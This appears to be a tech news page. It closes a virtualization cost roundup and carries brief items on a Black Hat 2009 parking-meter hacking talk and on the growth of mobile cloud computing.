The points coming across here are very important to take on board for anyone just getting into the virtualization game. While it can be very easy to get going with free or low-cost hypervisors offering basic functionality, as you scale up your activity in a production environment, significant additional demands will be placed on both your storage and network infrastructure, which may mandate upgrades.
It is also worth thinking ahead about the operational implications for day-to-day administration. If you get to the point where you need load balancing and more advanced management capability, e.g. to avoid a lot of manual overhead, then you may need to stump up for licences for the more advanced editions of the software and tools.
With Microsoft and Citrix now challenging VMware in this space, one of the biggest discussions in the industry at the moment is how vendors will package, bundle and price the various components required for customers as they virtualize on a larger scale.
We'll be picking up the question of costs in a later discussion, and inviting your feedback at that time.
Meanwhile, the second article in our workshop concerning the use of virtualization beyond the kind of consolidation projects we have been discussing prompted much less feedback and discussion. Given the amount of attention being paid to resource pooling and dynamic virtualization - aka cloud computing technology - by vendors and pundits, this is perhaps another example of the seller community being ahead of the buyers and users.
If you have any thoughts on this, or any of the other aspects of virtualization we have discussed in this roundup, feel free to have your say as usual in the comments. ®
InfoWorld: Black Hat 2009: How to hack a parking meter
by Robert McMillan
At Black Hat this week, security researchers showed how a technically savvy hacker can make a fake payment card that allows unlimited free parking on San Francisco's smart parking meter system.
CNet: Why mobile applications need cloud services
by Dave Rosenberg
A recent study released by ABI Research says that limited processing power, battery life, and data storage will limit mobile application growth in the mass market, even among smartphones like Apple's iPhone.
But applications that connect to cloud resources are much more likely to be successful than those that run only on the mobile device.
ABI Research predicts mobile cloud computing will deliver annual revenues topping $20 billion over the next five years. ABI Research senior analyst Mark Beccue says device fragmentation and memory currently limit the level of sophistication developers can deliver through mobile apps. By contrast, running mobile applications in the cloud will free up mobile processors while also enabling developers to create just one version of their application.
"Cloud computing will bring unprecedented sophistication to mobile applications," noted Beccue. "To mention just a few examples, business users will benefit from collaboration and data sharing apps. Personal users will gain from remote access apps allowing them to monitor home security systems, PCs or DVRs, and from social networking mashups that let them share photos and video or incorporate their phone address books and calendars."
Funambol, an open-source mobile cloud sync company, seems to agree with this view of the future. When I spoke to Fabrizio Capobianco, CEO of Funambol, he said: "Mobile cloud sync is emerging as a major new category of wireless services. Apple, Google, Nokia, Microsoft, Palm, and others recently introduced mobile cloud sync services and all mobile operators and ISPs are racing to keep up. Current solutions are fairly basic, but open source is enabling more flexibility and innovation among these folks because it is so easy to adapt."
You can hear more about open source and mobile cloud sync from Mike Taczak, a team lead for Webmail apps at Rackspace, who describes how the company uses Funambol in a video that accompanied the original article.